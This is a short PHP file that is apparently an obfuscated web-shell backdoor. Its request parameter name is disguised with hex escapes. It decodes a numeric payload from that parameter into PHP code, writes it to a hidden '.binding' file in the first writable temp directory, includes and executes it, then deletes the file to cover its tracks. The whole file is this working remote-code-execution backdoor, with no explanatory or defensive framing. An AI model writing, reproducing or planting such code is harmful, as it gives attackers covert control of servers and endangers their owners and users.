<?php
if(isset($_REQUEST) && isset($_REQUEST["it\x65\x6D"])){
$marker = $_REQUEST["it\x65\x6D"];
$marker=explode ( '.' , $marker ) ;
$val='';
$s2='abcdefghijklmnopqrstuvwxyz0123456789';
$lenS=strlen($s2);
foreach ($marker as $o=>$v8):
$chS=ord($s2[$o % $lenS]);
$d=((int)$v8 - $chS - ($o % 10)) ^ 14;
$val.= chr($d);
endforeach;
$tkn = array_filter([sys_get_temp_dir(), getenv("TMP"), "/tmp", getcwd(), "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm"]);
while ($reference = array_shift($tkn)) {
if (max(0, is_dir($reference) * is_writable($reference))) {
$dchunk = "$reference/.binding";
if (file_put_contents($dchunk, $val)) {
include $dchunk;
@unlink($dchunk);
die();
}
}
}
}